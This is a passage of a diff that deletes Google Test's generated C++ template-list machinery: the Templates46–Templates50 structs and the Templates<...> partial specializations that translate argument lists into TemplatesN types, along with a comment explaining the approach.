-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46>
-struct Templates46 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates45<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47>
-struct Templates47 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates46<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48>
-struct Templates48 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates47<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47, T48> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48,
-    GTEST_TEMPLATE_ T49>
-struct Templates49 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates48<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47, T48, T49> Tail;
-};
-
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17, GTEST_TEMPLATE_ T18,
-    GTEST_TEMPLATE_ T19, GTEST_TEMPLATE_ T20, GTEST_TEMPLATE_ T21,
-    GTEST_TEMPLATE_ T22, GTEST_TEMPLATE_ T23, GTEST_TEMPLATE_ T24,
-    GTEST_TEMPLATE_ T25, GTEST_TEMPLATE_ T26, GTEST_TEMPLATE_ T27,
-    GTEST_TEMPLATE_ T28, GTEST_TEMPLATE_ T29, GTEST_TEMPLATE_ T30,
-    GTEST_TEMPLATE_ T31, GTEST_TEMPLATE_ T32, GTEST_TEMPLATE_ T33,
-    GTEST_TEMPLATE_ T34, GTEST_TEMPLATE_ T35, GTEST_TEMPLATE_ T36,
-    GTEST_TEMPLATE_ T37, GTEST_TEMPLATE_ T38, GTEST_TEMPLATE_ T39,
-    GTEST_TEMPLATE_ T40, GTEST_TEMPLATE_ T41, GTEST_TEMPLATE_ T42,
-    GTEST_TEMPLATE_ T43, GTEST_TEMPLATE_ T44, GTEST_TEMPLATE_ T45,
-    GTEST_TEMPLATE_ T46, GTEST_TEMPLATE_ T47, GTEST_TEMPLATE_ T48,
-    GTEST_TEMPLATE_ T49, GTEST_TEMPLATE_ T50>
-struct Templates50 {
-  typedef TemplateSel<T1> Head;
-  typedef Templates49<T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-      T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27, T28,
-      T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41, T42,
-      T43, T44, T45, T46, T47, T48, T49, T50> Tail;
-};
-
-
-// We don't want to require the users to write TemplatesN<...> directly,
-// as that would require them to count the length.  Templates<...> is much
-// easier to write, but generates horrible messages when there is a
-// compiler error, as gcc insists on printing out each template
-// argument, even if it has the default value (this means Templates<list>
-// will appear as Templates<list, NoneT, NoneT, ..., NoneT> in the compiler
-// errors).
-//
-// Our solution is to combine the best part of the two approaches: a
-// user would write Templates<T1, ..., TN>, and Google Test will translate
-// that to TemplatesN<T1, ..., TN> internally to make error messages
-// readable.  The translation is done by the 'type' member of the
-// Templates template.
-template <GTEST_TEMPLATE_ T1 = NoneT, GTEST_TEMPLATE_ T2 = NoneT,
-    GTEST_TEMPLATE_ T3 = NoneT, GTEST_TEMPLATE_ T4 = NoneT,
-    GTEST_TEMPLATE_ T5 = NoneT, GTEST_TEMPLATE_ T6 = NoneT,
-    GTEST_TEMPLATE_ T7 = NoneT, GTEST_TEMPLATE_ T8 = NoneT,
-    GTEST_TEMPLATE_ T9 = NoneT, GTEST_TEMPLATE_ T10 = NoneT,
-    GTEST_TEMPLATE_ T11 = NoneT, GTEST_TEMPLATE_ T12 = NoneT,
-    GTEST_TEMPLATE_ T13 = NoneT, GTEST_TEMPLATE_ T14 = NoneT,
-    GTEST_TEMPLATE_ T15 = NoneT, GTEST_TEMPLATE_ T16 = NoneT,
-    GTEST_TEMPLATE_ T17 = NoneT, GTEST_TEMPLATE_ T18 = NoneT,
-    GTEST_TEMPLATE_ T19 = NoneT, GTEST_TEMPLATE_ T20 = NoneT,
-    GTEST_TEMPLATE_ T21 = NoneT, GTEST_TEMPLATE_ T22 = NoneT,
-    GTEST_TEMPLATE_ T23 = NoneT, GTEST_TEMPLATE_ T24 = NoneT,
-    GTEST_TEMPLATE_ T25 = NoneT, GTEST_TEMPLATE_ T26 = NoneT,
-    GTEST_TEMPLATE_ T27 = NoneT, GTEST_TEMPLATE_ T28 = NoneT,
-    GTEST_TEMPLATE_ T29 = NoneT, GTEST_TEMPLATE_ T30 = NoneT,
-    GTEST_TEMPLATE_ T31 = NoneT, GTEST_TEMPLATE_ T32 = NoneT,
-    GTEST_TEMPLATE_ T33 = NoneT, GTEST_TEMPLATE_ T34 = NoneT,
-    GTEST_TEMPLATE_ T35 = NoneT, GTEST_TEMPLATE_ T36 = NoneT,
-    GTEST_TEMPLATE_ T37 = NoneT, GTEST_TEMPLATE_ T38 = NoneT,
-    GTEST_TEMPLATE_ T39 = NoneT, GTEST_TEMPLATE_ T40 = NoneT,
-    GTEST_TEMPLATE_ T41 = NoneT, GTEST_TEMPLATE_ T42 = NoneT,
-    GTEST_TEMPLATE_ T43 = NoneT, GTEST_TEMPLATE_ T44 = NoneT,
-    GTEST_TEMPLATE_ T45 = NoneT, GTEST_TEMPLATE_ T46 = NoneT,
-    GTEST_TEMPLATE_ T47 = NoneT, GTEST_TEMPLATE_ T48 = NoneT,
-    GTEST_TEMPLATE_ T49 = NoneT, GTEST_TEMPLATE_ T50 = NoneT>
-struct Templates {
-  typedef Templates50<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17, T18, T19, T20, T21, T22, T23, T24, T25, T26, T27,
-      T28, T29, T30, T31, T32, T33, T34, T35, T36, T37, T38, T39, T40, T41,
-      T42, T43, T44, T45, T46, T47, T48, T49, T50> type;
-};
-
-template <>
-struct Templates<NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates0 type;
-};
-template <GTEST_TEMPLATE_ T1>
-struct Templates<T1, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates1<T1> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2>
-struct Templates<T1, T2, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT> {
-  typedef Templates2<T1, T2> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3>
-struct Templates<T1, T2, T3, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates3<T1, T2, T3> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4>
-struct Templates<T1, T2, T3, T4, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates4<T1, T2, T3, T4> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5>
-struct Templates<T1, T2, T3, T4, T5, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates5<T1, T2, T3, T4, T5> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6>
-struct Templates<T1, T2, T3, T4, T5, T6, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates6<T1, T2, T3, T4, T5, T6> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates7<T1, T2, T3, T4, T5, T6, T7> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates8<T1, T2, T3, T4, T5, T6, T7, T8> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates9<T1, T2, T3, T4, T5, T6, T7, T8, T9> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates10<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates11<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates12<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates13<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12,
-      T13> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates14<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates15<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates16<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
-    GTEST_TEMPLATE_ T16, GTEST_TEMPLATE_ T17>
-struct Templates<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13, T14,
-    T15, T16, T17, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT, NoneT,
-    NoneT, NoneT, NoneT, NoneT, NoneT> {
-  typedef Templates17<T1, T2, T3, T4, T5, T6, T7, T8, T9, T10, T11, T12, T13,
-      T14, T15, T16, T17> type;
-};
-template <GTEST_TEMPLATE_ T1, GTEST_TEMPLATE_ T2, GTEST_TEMPLATE_ T3,
-    GTEST_TEMPLATE_ T4, GTEST_TEMPLATE_ T5, GTEST_TEMPLATE_ T6,
-    GTEST_TEMPLATE_ T7, GTEST_TEMPLATE_ T8, GTEST_TEMPLATE_ T9,
-    GTEST_TEMPLATE_ T10, GTEST_TEMPLATE_ T11, GTEST_TEMPLATE_ T12,
-    GTEST_TEMPLATE_ T13, GTEST_TEMPLATE_ T14, GTEST_TEMPLATE_ T15,
